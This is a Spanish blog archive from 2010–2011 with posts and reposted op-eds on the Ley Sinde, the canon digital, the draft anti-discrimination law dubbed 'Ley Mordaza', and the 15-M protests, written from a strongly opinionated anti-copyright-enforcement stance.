Mostrando entradas con la etiqueta ley. Mostrar todas las entradas
Mostrando entradas con la etiqueta ley. Mostrar todas las entradas

lunes, 6 de junio de 2011

Ley Mordaza o cómo el Gobierno podría censurar la red

Leire Pajín es capaz de descubrir desigualdad hasta en el PIB y claro, con el objetivo de salvarnos a todos de las garras de la discriminación se siguen lanzando normativas. La última es la “Ley para la Igualdad de Trato y la No Discriminación”; también acuñada como “Ley Mordaza“.
En principio el objetivo no es otro que proteger a las minorías, pero el anteproyecto presentado es tan caótico y contradictorio que acaba conviertiéndose en la coartada perfecta para el censor. Si la Ley Sinde era potencialmente peligrosa contra la libertad de expresión, aquí hablamos de cómo el Gobierno podría cerrar miles de blogs, quizás incluso el que leéis, si le viniera en gana.
Difícilmente podría evitarse ya que un repaso al texto revela cómo un órgano unipersonal elegido a dedo (mediante Real Decreto), sin pasar Congreso de los Diputados y elegido por el Gobierno será el encargado de acusar a bloggers, quienes tendrán que demostrar que no hicieron nada injusto ya que eso de la presunción de inocencia es cosa de otros tiempos. Sarkozy diría que esto propio de una dictadura.

Destripando la Ley Mordaza

Las razones para sufrir el peso de una justicia que no veo por ningún lado es si en la moderación de comentarios existe alguna discriminación por “razón de nacimiento, origen racial o étnico, sexo, religión, convicción u opinión, edad, discapacidad, orientación o identidad sexual, enfermedad, lengua o cualquier otra condición o circunstancia personal o social” (Art.2).
La mayoría de los puntos son razonables, pero indagando en el amplio concepto de “opinión” podríamos llevarnos una multa de entre 10.000 y 60.000 euros e incluso llegar al cierre del blog si algún usuario comienza a opinar de un tema irrelevante que no tiene nada que ver con la noticia original, por ejemplo, de fútbol.
Entonces es cuando se plantean las preguntas: ¿cómo distinguir cuando le discriminamos y cuando es un verdadero incordio para el desarrollo de la página que merece ser eliminado? ¿Y si hablo de política sin cesar en un blog de deportes molestando a otros usuarios? ¿Y si alguien escribe en un idioma que no puedo moderar? La respuesta es que no hay respuesta. Si no te ajustas a una norma más subjetiva que tu color favorito, abre la cartera.
En ese caso, abrumados por las duras penas que propone la Ley podríamos decidir no moderar, pero no es tan sencillo. Incluso aunque queramos ser estrictos también podríamos ser multados, ya que se nos puede acusar de un concepto aún más ambiguo y maleable a gusto del consumidor: la discriminación indirecta. ¿Cuándo discriminamos indirectamente?
“Cuando una disposición, criterio o práctica aparentemente neutros ocasiona o puede ocasionar a una o varias personas una desventaja particular con respecto a otras”.
La redacción de esa frase desde un punto e vista legal es tan interpretable que si naciera de una república bananera diríamos (con razón) que se trata de una aproximación al totalitarismo. Prácticamente aplicando unas normas u otras según convenga y con un poco de labia, podríamos justificar el cierre de cualquier blog con comentarios.
Con el pack conjunto de Sinde y Pajín tenemos la mezcla perfecta de las instituciones para controlar la red y que parezca un accidente en uno de esos países en donde nos las damos de demócratas. Eso sí, luego no contarán que Internet es el futuro, que hay que protegerlo para que sea libre, ya.
ACTUALIZACIÓN: La crítica no sea realiza al texto literal en cuanto a los hechos sobre los cuales se pretende evitar la discriminación, sino en cuanto a su posible aplicación en la web. Dada la naturaleza de la misma, el anonimato imposibilita la mayoría de las discriminaciones, siendo la de opinión y lengua las únicas posibles. Si tenemos en cuenta el comportamiento de los usuarios; una Ley redactada tal y como está este borrador es una muestra de incomprensión del mundo que se desarrolla en la red. Quizás para hace 15 años hubiera sido razonable, pero culpar al webmaster como si se tratase de un medio clásico con control absoluto resulta un potencial ataque a la libertad.

viernes, 20 de mayo de 2011

La Junta Electoral Central prohibe las manifestaciones

La decisión de la Junta Electoral Central (JEC) tomada anoche de prohibir las manifestaciones en la jornada de reflexión y el día de las votaciones ha provocado un efecto llamada entre los jóvenes de Madrid y la acampada de la Puerta del Sol ha crecido considerablemente en las últimas horas.
Aunque el movimiento «15-M toma la plaza» respeta la decisión de la JEC asegura que los concentrados no tienen intención de irse de Sol, porque consideran que no están influyendo en la decisión de los ciudadanos a la hora de ejercer su derecho al voto. A la pregunta de qué harán si la Policía interviene e intenta desalojarles, uno de los portavoces de los concentrados ha dicho a Efe que son un movimiento pacífico por lo que esperan que todo se desarrolle pacíficamente. Como si de un cámping se tratara, el campamento de Sol se extiende a lo largo y ancho de la plaza y los toldos azules de días atrás ocupan ahora tan sólo un 30 por ciento, aproximadamente, del espacio.


El campamento ha aumentado y hay numerosas tiendas de campaña ubicadas en toda la plaza que se encuentra dividida en «calles» que han marcado los jóvenes con cinta de carrocero.
Más despiertos que otros días a estas horas, los concentrados empiezan a trabajar en las labores de limpieza, mientras se organizan por turnos para desayunar y descansar, ante la atenta mirada de la Policía -situada frente a la sede del Gobierno de la Comunidad de Madrid- que sigue vigilando sus movimientos. A mediodía, está previsto que vuelva a celebrarse una asamblea en la que los concentrados pondrán en común sus propuestas, reflexionarán y marcarán los pasos a dar en las próximas horas.

Previsión del Gobierno
El jefe del Ejecutivo, José Luis Rodríguez Zapatero, ha explicado hoy que el Ministerio de Justicia estudia la resolución de la Junta Electoral Central que prohíbe movilizaciones en la jornada electoral y ha garantizado que el Ministerio del Interior «actuará bien, correctamente, con inteligencia». Entrevistado en la SER, Zapatero no ha querido adelantar acontecimientos ni desvelar si las fuerzas de seguridad disolverán las concentraciones del denominado movimiento 15-M, y ha vuelto a mostrar su respeto y su sensibilidad ante las protestas pacíficas. «El Ministerio del Interior y el Gobierno actuarán bien, de manera inteligente; eso es lo que queremos, que se garanticen todos los derechos y se respete una jornada de reflexión, pero no adelantemos acontecimientos».

lunes, 16 de mayo de 2011

'Democracia Real Ya'

A una semana de las elecciones del 22M miles de jóvenes han tomado las calles para exigir una democracia real y más participativa, así como quejarse por el bipartidismo y la desafección de una clase política y financiera que no atiende a los problemas reales de la ciudadanía. ¿Conoces sus propuestas?
La resaca de las manifestaciones que ayer tomaron las calles de 50 ciudades españolas obliga a detenerse a pensar. ¿Quiénes son? Y, ¿qué piden? A la primera pregunta se da respuesta desde la página de inicio de la organización convocante, 'Democracia Real Ya': "Nosotros los desempleados, los mal remunerados, los subcontratados, los precarios, los jóvenes... queremos un cambio y un futuro digno".
Y explican: "Estamos hartos de reformas antisociales, de que nos dejen en el paro, de que los bancos que han provocado la crisis nos suban las hipotecas o se queden con nuestras viviendas, de que nos impongan leyes que limitan nuestra libertad en beneficio de los poderosos. Acusamos a los poderes políticos y económicos de nuestra precaria situación y exigimos un cambio de rumbo".
Sin una filiación política concreta (al menor declarada), por cuanto el movimiento pretende sobre todo aglutinar el descontento frente a unas estructuras incontrolables por los ciudadanos, sí se ha dicho reiteradamente que no se trata de una llamada a la abstención. Sí, contra el bipartidismo.

PROPUESTAS CONCRETAS
Lejos de quedarse en grandes declaraciones de intenciones, la plataforma se anticipa a las posibles críticas y se esfuerza por concretar alguna protestas que también pueden leerse en la página web. Entre ellas, sobre los políticos, por ejemplo, "supresión de los privilegios en el pago de impuestos, los años de cotización y el monto de las pensiones" ó la "eliminación de la inmunidad asociada al cargo. Imprescriptibilidad de los delitos de corrupción".
Respecto al desempleo, "reparto del trabajo fomentando las reducciones de jornada y la conciliación laboral hasta acabar con el desempleo estructural" ó "bonificaciones para empresas con menos del 10% de empleo temporal". Asimismo, proponen medidas sobre vivienda, como "que se permita la dación en pago de las viviendas para cancelar las hipotecas" o para controlar a las instituciones financieras, como la "prohibición de cualquier tipo de rescate o inyección de capital a entidades bancarias: aquellas entidades en dificultades deben quebrar o ser nacionalizadas para constituir una banca pública bajo control social".
Y, ¿AHORA QUÉ?
En Twitter la etiqueta '15mani' continúa en el liderato del los trending topic desde ayer, ya ya tiene alternativa en inglés para hacer llegar el eco de las protestas lejos de nuestras fronteras: 'spanishrevolution'. Y, la pregunta que está en boca de todos, ¿habrá más manifestaciones?, ¿cuándo?

Visto en: http://www.que.es/ultimas-noticias/espana/201105161002-democracia-real-manifestaciones-15m-que-cont.html

jueves, 27 de enero de 2011

Sinde NO, Álex SI

Hace poco nuestra "querida" ministra de Cultura escribía un post diciendo que el adversario era otro. Pues bien, hoy parece ser que ya da nombres. El enemigo según Angeles González-Sinde es el señor Alex de la Iglesia. Por decir lo que piensa. Por principios. Por libertad de expresion. Por dejarla con las bragas al aire. ¿Hasta donde vamos a llegar?


martes, 25 de enero de 2011

Putos Políticos

Esto es un sinsentido. El rechazo es generalizado, pero ellos se obsesionan en hacer salir adelante una ley tan impopular como injusta. A mi ya me habían decepcionado muchas veces, pero es que ahora además no los entiendo.
¿Para quién luchan? ¿Para quién dirigen? ¿Para quién legislan?
Para nosotros está claro que no.


     Dais ASCO

    jueves, 20 de enero de 2011

    Mis novelas gratis

    Alberto Vázquez-Figueroa 
    A partir de ahora mis novelas se editarán simultáneamente en edición "cara", de las llamadas "de tapa dura", en edición de bolsillo a mitad de precio, podrán descargarse gratuitamente en "Internet" y todos los periódicos o revistas que lo deseen están autorizados a publicarlas al estilo de las antiguas novelas por entregas con la diferencia que en este caso no tendrán obligación de pagarme nada en concepto de derechos de autor.
    Me han preguntado si es que me he vuelto loco, me sobra el dinero o pretendo arruinarme y arruinar de paso a mi editor. No es el caso.
    He meditado largamente sobre el tema y he llegado a la conclusión de que hoy en día hay público para todos los niveles adquisitivos del mismo modo que quien lo desea puede almorzar en un restaurante de lujo, en una simple hamburguesería e incluso acudir a un comedor social.
    También puede hacerse un traje a medida, comprárselo en unos grandes almacenes o en un rastrillo dominguero.
    Igual ocurre en la mayor parte de las facetas del consumo, excepto en lo que se refiere a los lectores que tienen que resignarse a pagar el precio que marca el editor que ha adquirido los derechos en exclusiva de un determinado libro o aguardar años hasta que se edite en bolsillo.
    Y desde luego nunca lo obtendrá gratis.
    Y se me antoja injusto porque la cultura es tan importante como comer o vestirse, y desde luego mucho más importante que adquirir un coche donde se ofrecen cien gamas de precios donde elegir.
      Mi próxima novela trata sobre Irak y las oscuras maquinaciones de las grandes compañías americanas que inventaron la existencia de armas de destrucción masiva con el fin de iniciar una guerra que ha costado casi medio millón de muertos y nunca  podrá ganarse, pero que produce miles de millones de beneficios a empresas directamente ligadas a lo mas altos cargos de la administración republicana.
    Y a mis lectores, cualquiera que sea su condición social o capacidad adquisitiva, ese tema  les interesa conocerlo a fondo en estos momentos, no dentro de dos años, que sería cuando cualquier otra editorial considerase que ya había exprimido al máximo el limón de la "tapa dura" y tuviera a bien editarla en bolsillo para unos lectores "De Segunda Categoría".
    No deben existir lectores de segunda ni de tercera categoría, porque lo que importa es su relación directa con el autor independientemente de lo lujoso que sea el vehículo que proporcione dicha relación.
    Al cumplir cincuenta años como escritor muchas personas me han asegurado que se acostumbraron a leer con mis novelas de aventuras, y aunque algunas me han sido infieles con el paso del tiempo, lo que importa es el hecho de que empezaron a leer y aficionaron de igual modos a quienes les rodeaban.
    Folletines del estilo de "Los tres mosqueteros", "Los Miserables" o "El Conde de Montecristo"  consiguieron que, al poder acceder gratuitamente a tan magníficos textos, en el transcurso de una sola generación el número de lectores franceses se multiplicara por tres.
    Los editores no tienen derecho a quejarse de que "se lee poco" mientras mantienen el control sobre el precio de lo que en ese momento interesa, ni las autoridades deberían promover absurdas campañas publicitarias que no conducen mas que a gastar dinero; lo que deben hacer es presionar a los editores a la hora de poner los libros al alcance de todos los bolsillos.
     Personalmente prefiero que me lean dos estudiantes, obreros o secretarias en el autobús por siete euros, que un alto ejecutivo en su cómodo despacho por veinte, porque aunque gane menos si el libro es bueno esos dos lectores se convertían en cuatro y luego en ocho, y resulta evidente que existen muchos mas obreros, estudiantes y secretarias que altos ejecutivos.
    Y si el libro es malo ni unos ni otros lo compraran.

    En cuanto al hecho de ofrecerlo gratuitamente en "Internet" tengo claro que quien lo descargue de la red nunca hubiera comprado mi novela, o sea que prefiero que me lea gratis a que no me lea.
    Tal vez la próxima vez se decida a comprar un libro aunque no sea mío.
    Algo es cierto: he vendido casi veinticinco millones de libros y todo el dinero que me han pagado me lo he gastado, pero una gran parte de los lectores que he conseguido, aun los conservo.
    Y de todo el dinero que gané la mitad se lo llevo Hacienda.
    Sin embargo Hacienda aun no ha logrado arrebatarme un solo lector.
    En Inglaterra, país culto donde los haya, los escritores no pagan impuestos por el fruto de su trabajo, pero en España, pese a pertenecer también a la Unión Europea, cada año debo entregar la mitad de mis ingresos a Hacienda o me embargan.
    Eso significa que un escritor ingles cuenta con el doble de medios económicos que yo para viajar o investigar a la hora de encarar un nuevo trabajo.
    Eso no evita que las autoridades españolas se lamenten de que nos esté invadiendo la cultura anglosajona, y lo único que se les ocurre para remediarlo es adquirir los más emblemáticos y costosos edificios de cada capital con el fin de instalar un nuevo Instituto Cervantes en el que dar cobijo a "intelectuales" afines al partido que se encuentre en esos momentos en el poder.  
     Para nuestra voraz, inculta y derrochadora administración tan solo somos europeos cuando conviene, y esa es una de las razones por la que  prefiero regalarle la mitad de mis ganancias a unos lectores anónimos que tal vez me lo agradezcan, que a un gobierno que no solo no lo agradece, sino que no acepta que para escribir un una novela interesante sea necesario viajar e investigar.
    Siento curiosidad por saber si las editoriales continuaran con su absurda política inmovilista o comprenderán que es hora de renovar unos hábitos que no han evolucionado un ápice en trescientos años mientras que a su alrededor el mundo se transforma a marchas forzadas.
    En mi juventud una película se estrenaba en una única y enorme sala, estaba casi un año en cartel y tan solo entonces pasaba a los cines de barrio. Hoy se estrena en cuarenta multisalas, a los quince días se edita en "DVD", al mes se compra en televisión, y se puede ver en las cadenas abiertas a los tres meses.
    Si las grandes productoras cinematográficas, con sus complejos estudios de "marketing" han llegado al convencimiento de que esa es la formula que conviene en los tiempos que corren, las editoriales deberían tomar buena nota al respecto.   
    El mundo del libro tiene la enorme suerte de que no resulta rentable a los "piratas" del "Top-Manta"  que tanto daño hace a las industrias del cine y la música, pero por eso mismo, y por la gran competencia de la televisión y todo tipo de deportes de masas, los que lo gestionan deberían plantearse un cambio radical e intentar conseguir lectores antes que beneficios.

    Sin lectores no hay beneficios, y cuando haya muchos lectores ya llegaran los beneficios.

    Resultará muy interesante comprobar si los Ministerio de Cultura y Hacienda seguirán opinando que es preferible que los empresarios- en este caso los editores- continúen manteniendo el privilegio de abaratar los precios únicamente cuando les convenga sin tener en cuenta los intereses de los lectores, al tiempo que no cesan de apretarle las clavijas al pobre trabajador- en este caso el autor.
    Por lo visto un gobierno que se autodenomina socialista considera que es preferible proteger al que se beneficia económicamente de la cultura que al que la crea.
    Existen varias editoriales multimillonarias, pero ni un solo autor español mínimamente "acomodado"
    El viejo dicho, "En España escribir es llorar" ya no tiene sentido: debería decirse "En España escribir- y leer- es pagar".
                                                                     A.V-F (Julio 2007)
    http://vazquezfigueroa.blog.com/

    martes, 18 de enero de 2011

    Yo no, otro!

    Tras "Mentiras y Gordas", llega "El adversario es otro". ¿Quién? Pués eso, otro. ¿O no?


    El adversario es otro

    "Por parte de vos, Miguel de Cervantes, nos fue hecha relación que habíades compuesto un libro intitulado El ingenioso hidalgo de la Mancha, el cual os había costado mucho trabajo y era muy útil y provechoso (...) Os damos licencia y facultad para que vos, o la persona que vuestro poder hubiere y no otra alguna, podais imprimir el dicho libro (...) So pena que la persona o personas que sin tener vuestro poder lo imprimiere o vendiere: o hiciere imprimir o vender, por el mesmo caso pierda la impresión que hiciere, con los moldes y aparejos de ella: y más incurra en pena de cincuenta mil maravedís cada vez que lo contrario hiciere... Fecha en Valladolid a veinte y seis días del mes de Septiembre de mil seiscientos y cuatro años. Yo el Rey."

    El fragmento anterior, que se puede encontrar en El Quijote interactivo (www.bne.es), es parte del trámite legal de toda publicación en 1604. En esa licencia ya se establecen muy claramente puntos que hoy nos resultan familiares: no solo que el único propietario de los derechos sobre El Quijote es Miguel de Cervantes, sino que la obra es fruto de su trabajo. También indica que solo el autor tiene capacidad para ceder esos derechos exclusivos de reproducción y comercialización de su obra a terceros y, lo que es más importante, expresamente advierte sobre una multa cuantiosa para quien imprima o copie la obra sin permiso. Y es que la cuestión de los derechos de los autores no es ni mucho menos nueva. Con cada cambio tecnológico (en 1604 se trataba de la aparición del maravilloso invento de Gutenberg), los derechos de los hombres y mujeres sobre sus creaciones han atravesado una enorme sacudida.
    Sin embargo, cada generación considera que el suyo es un tiempo nuevo y no tiene obligación de recordar que fue la piratería la que empujó a Cervantes a escribir la segunda parte de su novela, o que fue la piratería, tan frecuente en el cine mudo (otro salto tecnológico), la que acabó con cineastas innovadores como Méliès. También contra la piratería y a favor del respeto a los derechos de autor lucharon desde Beaumarchais a Immanuel Kant o, ya en el siglo XX, Mark Twain, hasta el punto de que el término "pirata" en esta acepción fue popularizado por el autor estadounidense.

    Lo que diferencia el debate de los tiempos de Cervantes, Beaumarchais o Mèliés del de hoy es que Internet y la digitalización no son un simple salto tecnológico más, sino una descomunal mutación cultural, económica y política sin precedentes.

    La pérdida de lo público, la crisis de las instituciones, la indiferencia hacia la política, la precariedad de nuestros vínculos laborales o personales, la incertidumbre y la desconfianza, sumadas a una economía de mercado que huye de las reglas, hacen de Internet en nuestro imaginario una importante alternativa al orden de cosas que conocemos. Una alternativa atractiva y aparentemente viable que creemos que nos pertenece y que se ha convertido en una extensión de nuestros cerebros y de nuestras casas. Pensamos que la Red es de las pocas cosas que no tienen dueño, y sentimos así que viene a cubrir ese vacío inmenso que percibimos, aunque no sepamos muy bien a qué achacarlo.

    Los ciudadanos del siglo XXI tenemos la percepción no solo de que Internet es nuestro, sino de que nuestras opiniones cuentan más allí que en el espacio físico donde desarrollamos nuestras insatisfechas vidas. Podría decirse incluso que para muchos sus vidas virtuales son mejores que las reales. O al menos que su presencia, su mera existencia, cuenta mucho más. Internet nos ofrece alternativas a la realidad que podemos construir con nuestras manos. Durante el rato que estamos conectados, dejamos de ser meros consumidores para volver a ser, como antaño, productores de algo con lo que identificarnos.
    Si perder un poco de intimidad es el precio que hay que pagar a cambio de una vida sin instituciones, sin normas heredadas y sin patronal, nos parece barato. Menos seguridad por más libertad es la fórmula acuñada por Zygmunt Bauman para definir estos tiempos líquidos. Al fin y al cabo, hacía mucho tiempo que no nos sentíamos miembros de una comunidad tan poderosa.

    Que estas semanas el debate sobre la Red sea apasionado no debe, por todo ello, sorprendernos. Es mucho lo que hay en juego. La revolución social se hará por la Red o no se hará, parecen creer muchos, sobre todo esos jóvenes hastiados de una sociedad en la que no se reconocen y en la que encuentran poco o ningún espacio para la expresión y la participación.

    Hasta aquí todo se entiende. Lo que quizá sorprenda a un observador del futuro que mire atrás es el antagonismo que, al menos en nuestro país, el debate de Internet ha generado: gente de la cultura versus gente de la tecnología. Los derechos de autor son vistos como palos en las ruedas que solo detienen el avance del progreso, el avance hacia ese cambio social democrático e igualitario, hacia esa transmisión del saber y de nuevos valores que tanto necesitamos y que la Red parece propulsar.


    Digamos que esta es la sinopsis de la película, pero algo falla porque la narración no avanza hacia el cambio de modelo ni de negocio ni de sociedad. Y es que el antagonismo parte de un falso supuesto que genera un problema grave de estructura en este guion: la identificación del antagonista. Mientras el héroe (los usuarios de la Red, el mítico internauta) pierde tiempo y energía con el que considera su enemigo (la gente de la cultura), el verdadero adversario está en otro lado haciéndose más y más fuerte.

    Pero esta función no ha hecho más que estrenarse, pues aunque parezca que siempre hemos vivido rodeados de pantallas y pantallitas, en realidad somos neonatos. De manera que todavía nos quedan por delante el segundo y el tercer acto. Vaticino que en ellos ese falso antagonista -los de la cultura- se revelará como el aliado natural y verdadero del héroe -el anónimo y desinteresado internauta-, y juntos encontrarán las fórmulas más eficaces para hacer de la Red ese espacio autónomo de creación, libertad y democracia que ya todos sabemos que es. Y la protegerán juntos de las verdaderas amenazas que son, me temo, muy distintas.

    Esa ley que popularmente se conoce con el apellido de mi abuela no tiene por objeto ni controlar ni detener el progreso en la Red. De la misma manera que el propósito de las leyes de propiedad intelectual no fue nunca enriquecer a los autores, sino velar por las necesidades e intereses de toda la sociedad: proteger las ideas para que crezcan las ideas. Y a nuestra sociedad -a cualquier sociedad, pero más a la española, que cuenta ya con un inmenso patrimonio cultural en una lengua en expansión- le interesa estratégicamente tener un tejido cultural fuerte, dinámico y diverso.

    De los maravedíes al euro han sucedido muchas cosas, sin duda, pero creo que todos coincidiremos en que no fueron Cervantes ni sus colegas autores ni los actores de sus comedias quienes impidieron que llegásemos siglos después a Internet. Más bien fue al contrario. Las transformaciones siempre se hicieron gracias al pensamiento crítico que proporciona la cultura. Lo lamentable sería que los Méliès de hoy fueran erradicados de la Tierra como lo fue el gran cineasta francés cuando gigantes como Edison lo llevaron a la ruina imponiendo un modelo de negocio que llevaba anejo un modelo narrativo, estético e ideológico único.

    Como no estemos muy atentos, eso es exactamente lo que ocurrirá con la cultura. Cada vez menos gente podrá dedicarse profesionalmente a ella y nos veremos abocados a un menú monofágico de apenas unos pocos platos que gusten a muchos y que decidan por nosotros grandes intereses económicos (los verdaderos dueños de la Red).

    Que Internet tiene que ver con democracia es algo que el Gobierno sabe bien. No en vano impulsa cada año desde los Presupuestos Generales del Estado, y a través de Ministerios como Industria, Ciencia e Innovación, Educación y, por supuesto, Cultura, fuertes inversiones para que España no se quede atrás y esté entre los primeros en el desarrollo de las TIC y en acceso a la Red. Por eso también ha sido la Ley de Economía Sostenible la que aborda en más de un artículo, además de la ya célebre Disposición Final, el impulso a esa transformación que favorecerá la recuperación económica y nuestra competitividad internacional. Para que nadie mande sobre las ideas de nadie. Para que nadie imponga modelos a nadie. Para garantizar la convivencia de todos los derechos, pero, sobre todo, para favorecer el avance de la sociedad hacia más democracia, más voces y más justicia.
    Angeles González-Sinde
    http://www.elpais.com/articulo/cultura/adversario/elpepucul/20110118elpepicul_2/Tes

    lunes, 17 de enero de 2011

    Paga el canon y calla

    El mensaje a los ciudadanos y a quienes luchan por disminuir el abuso que supone la compensación por copia privada es claro: "paga el canon y calla".

    Por si quedaba alguna duda, los hechos confirman lo que era previsible. La reforma del canon digital para adecuarlo a la sentencia que declara ilegal su aplicación indiscriminada en España no va a ser eficaz, veloz ni consensuada. Podría demorarse "meses". Hay que reconocer que en este aspecto González-Sinde no mintió, aunque sí trató de tomar por idiotas a los diputados y a los ciudadanos al decir que trataría de actualizar la normativa "lo más rápidamente posible", puesto que se dio a sí misma medio año para cambiar las cosas. Sin embargo, en el resto de los puntos salta a la vista la ausencia de sinceridad de lo que dijo la ministra hace más de tres semanas.

    Se está negociando la reforma de la compensación por copia privada, eso es cierto, pero aquí no va a haber eficacia (excepto, con toda seguridad, para la SGAE y demás entidades de gestión), ni mucho menos consenso. Sobre esto último, el Gobierno está dispuesto a reunirse, y lo hace, con las "fuerzas vivas" del canon. Quienes han acudido al primero de los encuentros son las sociedades de gestión de derechos de autor, que se embolsan el canon, y Ametic. Sobre esta última hay que destacar que es una patronal (surgida de la fusión de otras dos) presentada en sociedad hace unas semanas por el Ministro de Industria, Pablo Sebastián, y cuyos miembros se van a ver beneficiados por los jugosos fondos de la prórroga del Plan Avanza 2. En concreto, para este año están presupuestados 1.116 millones de euros. Dudamos de que ante estas cifras, que además están pidiendo que se incrementen, estos señores quieran ser un incordio en sus negociaciones por el canon.

    Quienes por el momento no han sido llamados a la mesa de negociaciones son las asociaciones de internautas, de consumidores y Apemit, la asociación de pequeñas y medianas empresas de informáticas afectadas de forma negativa por la compensación por copia privada. Dicho de otro modo, quienes pagan el canon o a quienes les destroza su cuenta de resultados no tienen derecho a voz ni voto en tan grave asunto. Al menos, por el momento. Lo que hay por ahora hacia el común de los españoles con respecto al canon es un puro y duro: "calla y paga". Y lo más seguro es que esto se mantenga.

    Por si queda alguna duda de cuál es el papel que corresponde a quien sufre el canon, el Gobierno ni se ha molestado en decir cuándo podrán participar en las conversaciones. Quienes se han encargado de ello han sido los representantes de las entidades de gestión y de Ametic. Ambos han dicho que la participación de las asociaciones de internautas y Apemit tendrá lugar cuando lo marque la ley. Suena a pitorreo. Ninguna norma jurídica marca el momento en el que este tipo de organizaciones deben entrar en juego en unas negociaciones que, se supone, son a varias bandas. Pero el representante de la SGAE y sus hermanas han ido más allá, se han atrevido a indicar que los que todavía no tienen voz podrán hablar "en el momento adecuado". Le ha faltado decir que eso será cuando ya esté todo decidido.

    En resumen, como señalábamos más arriba, el mensaje a los ciudadanos y a quienes luchan por disminuir el abuso que supone la compensación por copia privada es claro: "paga el canon y calla".

    Antonio José Chinchetru es autor de Sobre la Red 2.0.
    Nota: El autor autoriza a todo aquel que quiera hacerlo, incluidas las empresas de press-clipping, a reproducir este artículo, con la condición de que se cite a Libertad Digital como sitio original de publicación. Además, niega a la FAPE o cualquier otra entidad la autoridad para cobrar a las citadas compañías o cualquier otra persona o entidad por dichas reproducciones.

    jueves, 13 de enero de 2011

    Ira

    gutierrezaragon.jpgEste señor de la foto de la izquierda se llama Manuel Gutiérrez Aragón. Y en una cena ante numerosos testigos el pasado viernes 7 de enero pronunció las siguientes frases: "hay que luchar por la propiedad intelectual y no dar ninguna tregua a los internautas, porque es como pactar con los terroristas", y "con tanta demagogia a la gente se le olvida de que se trata de una industria y que, por tanto, es como robar en El Corte Inglés". Así, sin más matices. El señor Gutiérrez Aragón, sin despeinarse lo más mínimo, ha calificado a cientos de miles de usuarios de la red en España nada menos que de "ladrones" y "terroristas". En un país que ha sufrido el impacto directo del terrorismo durante casi cincuenta años,  el uso del calificativo "terroristas" aplicado a pacíficos ciudadanos es de tal mezquindad e irresponsabilidad, que no puede quedar sin respuesta. No sé vosotros, pero yo me siento directamente insultado.
    Una primera medida lógica, siendo civilizado y evitando responder al insulto con el insulto, es ignorar completamente a partir de ahora todo producto que tenga la más mínima relación con este señor. Este señor hace películas, como guionista y director: aquí tienes la lista completa. Y las hace presuntamente para que vayamos a verlas tú y yo. Pues que espere sentado. Al insulto se responde, como mínimo, ignorando al que lo profiere y evitando ponerse a su altura.
    Pero la segunda medida podría ser diferente, y nos lleva a plantearnos los mecanismos que estamos empleando en esta desigual contienda que se libra entre, por un lado, las entidades de gestión y las industrias dedicadas a la explotación de la propiedad intelectual y, por otro, la gran mayoría de los ciudadanos: hasta el momento, la respuesta ciudadana ha sido siempre reactiva. Es decir, ante una acción de la industria, utilizando los muchos medios a su alcance, bien económicos, de llegada a los medios o al poder político, se planteaba una reacción posterior de los ciudadanos. Ante una denuncia a una página de enlaces, por ejemplo, algunos abogados, de manera loable, hacían esfuerzos para poder llevar ese caso, incluso teniendo en cuenta un importante nivel de riesgo y una posibilidad no despreciable de no poder repercutir sus honorarios profesionales. El colectivo de ciudadanos a los que el señor Gutiérrez Aragón y otros tantos insultan y calumnian carece de estructura y de medios para pasar de la reactividad a la proactividad, para tomar la iniciativa, y esa circunstancia sesga totalmente los resultados del tema en discusión.
    ¿Hay un delito en las declaraciones del señor Gutiérrez Aragón? No soy abogado, pero en nuestro país ya ha habido condenas en firme a periodistas, ratificadas por el Tribunal Supremo, por algo mucho más sutil: calificar de "impuesto revolucionario" el canon de la SGAE a la hostelería. En este caso, el supuesto de intromisión ilegítima en el honor ni siquiera era contra una persona física, sino contra una persona jurídica. ¿Cabe hablar del honor de una institución? ¿Cabría por tanto hacerlo del de un colectivo? ¿Puede/debe sostenerse jurídicamente una demanda colectiva a este señor en la que se personase como parte acusatoria todo aquel que se haya sentido insultado, y reclamase el correspondiente resarcimiento? Porque si se puede, valdría la pena constituir algún tipo de fondo de defensa jurídica y empezar a utilizarlo.
    Que un bando se dedique a calificar al otro de "piratas", "delincuentes" o incluso "terroristas" con total impunidad es, aparte de muy poco inteligente si quienes están al otro lado son tus presuntos clientes, algo que condiciona enormemente el posible diálogo, una manera de envenenar la discusión, y, sobre todo, una condición de desigualdad e injusticia total si después resulta que quien está al otro lado recurre constantemente a la judicialización de la conversación cuando interpreta insultos hacia su entidad o sus representantes. Pasar de lo meramente reactivo a lo proactivo tiene ventajas evidentes en toda contienda, y más si quienes estamos al otro lado somos más, somos una parte enormemente significativa del conjunto de la ciudadanía. Para empezar una discusión seria en este tema es preciso que quienes utilicen la palabra "piratas" para referirse a los ciudadanos, "robo" para referirse a un comportamiento que los jueces han calificado como no constitutivo de delito, o lindezas similares se vean obligados a afrontar las consecuencias de sus palabras. Los ciudadanos debemos, dado que no nos respetan, hacernos respetar con los medios a nuestro alcance.
    Los insultos de Manuel Gutiérrez Aragón no deberían, en una sociedad civilizada, quedar sin respuesta. Esta entrada es la mía, mi derecho al pataleo ante sus insultos. ¿Dónde está tu respuesta? ¿Te vas a quedar tan tranquilo?

    Miedo

    "Durante toda la reunión, no pude sacarme de la cabeza las imágenes de la película 'El hundimiento': encerrados en un búnker, sin ver ni querer ver el afuera, delirando planes inaplicables para ganar la guerra, atados unos a otros por fidelidades torpes, muertos de miedo porque el fin se acerca, viendo enemigos y traidores por todos lados, sin atreverse a cuestionar las ideas que les arrastran al abismo, temerosos de los bárbaros que están a punto de llegar… "

    Amador Fernández-Savater, "La cena del miedo (mi reunión con la ministra González Sinde)" - 11 de enero de 2011

    miércoles, 22 de diciembre de 2010

    Reacciones en twitter tras la votación

    Algunas reacciones en Twitter tras la votación de la Ley Sinde.

    Sobre la Ministra...
    • Internautas invita a la ministra de Cultura a dimitir en un «acto de coherencia» tras el fracaso de la «ley Sinde»
    • Buenos días, ha dimitido Sinde ya? #sindegate
    • Los artistas prometen presentar en la UE otro modelo 'más contundente' tras el rechazo a la 'ley Sinde'
    • Sinde consiguió más espectadores en Canal del Congreso para ver rechazo de su ley q en sus pésimas películas
    • Creo que El País ha puesto su granito de arena contra la #leysinde dejando todo el día la foto de González "Ogro" Sinde en portada...
    • La Ley Sinde no ha sido aprobada, tomaaaaaa!!!! seguiremos disfrutando gratis de las mejores series!!
    • Ángeles González-Sinde os desea Feliz Navidad y un prospero año 1984 #sindegate #sinde #leysinde

    Sobre Alejandro Sanz
    • "El día que me baje un disco de Alejandro Sanz, me entrego a la justicia"
    • Leyendo lo de Alejandro Sanz. Me pregunto quién es/son los hipócritas aquí?
    • Buenas tardes, mi nombre es Alejandro Sanz y mis conciertos los paso apuntando el micro hacia el público #alejandrosanzfacts
